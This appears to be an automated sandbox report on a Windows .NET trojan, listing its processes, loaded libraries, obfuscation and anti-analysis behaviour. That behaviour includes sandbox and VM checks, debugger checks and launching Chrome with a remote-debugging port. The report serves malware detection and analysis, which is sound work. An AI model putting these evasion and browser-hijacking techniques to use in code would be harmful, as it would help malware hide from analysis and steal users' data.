Source: 0.2.ZT0KQ1PC.exe.4129550.0.raw.unpack, OqnvDGyNnPPvG6T46X.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@31/19@8/5

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe

Code function: 2_2_0042A3F0 CreateToolhelp32Snapshot,Process32First,

2_2_0042A3F0

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8D0N1ZEL.htm

Jump to behavior

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3328:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5408

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\c9e64e29-e45d-44f7-b891-b93dd5f0a0d2

Jump to behavior

Source: ZT0KQ1PC.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: ZT0KQ1PC.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chrome.exe, 00000006.00000002.2934650256.00004C1C04B58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: chrome.exe, 00000006.00000002.2936001695.00004C1C04EC0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT id,url,visit_time,from_visit,external_referrer_url,transition,segment_id,visit_duration,incremented_omnibox_typed_score,opener_visit,originator_cache_guid,originator_visit_id,originator_from_visit,originator_opener_visit,is_known_to_sync,consider_for_ntp_most_visited FROM visits WHERE visit_time>=? AND visit_time<? ORDER BY visit_time DESC, id DESCALUE:2};L

Source: ZT0KQ1PC.exe

ReversingLabs: Detection: 28%

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe

File read: C:\Users\user\Desktop\ZT0KQ1PC.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ZT0KQ1PC.exe "C:\Users\user\Desktop\ZT0KQ1PC.exe"
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process created: C:\Users\user\Desktop\ZT0KQ1PC.exe "C:\Users\user\Desktop\ZT0KQ1PC.exe"
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 936
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2644 --field-trial-handle=2284,i,919765680095075833,18170767553792386952,262144 /prefetch:8
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process created: C:\Users\user\Desktop\ZT0KQ1PC.exe "C:\Users\user\Desktop\ZT0KQ1PC.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2644 --field-trial-handle=2284,i,919765680095075833,18170767553792386952,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: ZT0KQ1PC.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ZT0KQ1PC.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: ZT0KQ1PC.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: System.Windows.Forms.pdb source: WER9128.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb source: WER9128.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdbRSDS source: WER9128.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdb source: WER9128.tmp.dmp.5.dr
Source:	Binary string: System.pdb) source: WER9128.tmp.dmp.5.dr
Source:	Binary string: Handler.pdb source: ZT0KQ1PC.exe, WER9128.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER9128.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdbTz source: WER9128.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdb source: WER9128.tmp.dmp.5.dr
Source:	Binary string: System.pdb source: WER9128.tmp.dmp.5.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: ZT0KQ1PC.exe, OqnvDGyNnPPvG6T46X.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.ZT0KQ1PC.exe.4129550.0.raw.unpack, OqnvDGyNnPPvG6T46X.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: ZT0KQ1PC.exe

Static PE information: 0xB22C430A [Sun Sep 21 17:53:14 2064 UTC]

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00426230 push eax; mov dword ptr [esp], 00000000h	2_2_00426234
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00401710 push eax; mov dword ptr [esp], 00000000h	2_2_00401712
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00401B60 push eax; mov dword ptr [esp], 00000000h	2_2_00401B63

Source: ZT0KQ1PC.exe, OqnvDGyNnPPvG6T46X.cs	High entropy of concatenated method names: 'Qerauq6FF2', 'nW4lBacjpc', 'NBbmObeVEM', 'bqpm7jSIZK', 'sREmHxnXei', 'uu3mAcrNh4', 'n0OmcKY1xJ', 'A1VRDsBnZ', 'oqBlqdN3O', 'pRhoMmNSX'
Source: 0.2.ZT0KQ1PC.exe.4129550.0.raw.unpack, OqnvDGyNnPPvG6T46X.cs	High entropy of concatenated method names: 'Qerauq6FF2', 'nW4lBacjpc', 'NBbmObeVEM', 'bqpm7jSIZK', 'sREmHxnXei', 'uu3mAcrNh4', 'n0OmcKY1xJ', 'A1VRDsBnZ', 'oqBlqdN3O', 'pRhoMmNSX'

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: ZT0KQ1PC.exe	Binary or memory string: DIR_WATCH.DLL
Source: ZT0KQ1PC.exe	Binary or memory string: SBIEDLL.DLL
Source: ZT0KQ1PC.exe	Binary or memory string: API_LOG.DLL
Source: ZT0KQ1PC.exe, 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: EABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HS%S%SDELAYS.TMPWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Memory allocated: 2FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Memory allocated: 3120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Memory allocated: 5120000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00410E80 FindFirstFileA,		2_2_00410E80
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_0040F070 FindFirstFileA,		2_2_0040F070

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe

Code function: 2_2_00426960 GetSystemInfo,

2_2_00426960

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: chrome.exe, 00000006.00000002.2934558668.00004C1C04B14000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=242b7dcc-eb47-45c9-8565-ca1c8fd446dd
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: ZT0KQ1PC.exe, 00000002.00000002.1831552138.00000000010E9000.00000004.00000020.00020000.00000000.sdmp, ZT0KQ1PC.exe, 00000002.00000002.1831552138.0000000001088000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: chrome.exe, 00000006.00000002.2926841616.00000220C434E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: chrome.exe, 00000006.00000002.2929678850.00000220CE6E0000.00000002.00000001.00040000.00000012.sdmp, chrome.exe, 00000006.00000003.1966921194.00004C1C06004000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ~]lx{tn~lzyqeMu{_tvwpd
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 0_2_03128631 mov edi, dword ptr fs:[00000030h]	0_2_03128631
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 0_2_031287AE mov edi, dword ptr fs:[00000030h]	0_2_031287AE
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004017C0 mov eax, dword ptr fs:[00000030h]	2_2_004017C0
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_00401780 mov eax, dword ptr fs:[00000030h]	2_2_00401780
Source: C:\Users\user\Desktop\ZT0KQ1PC.exe	Code function: 2_2_004017A0 test dword ptr fs:[00000030h], 00000068h	2_2_004017A0

Source: C:\Users\user\Desktop\ZT0KQ1PC.exe

Memory allocated: page read and write | page guard

Jump to behavior

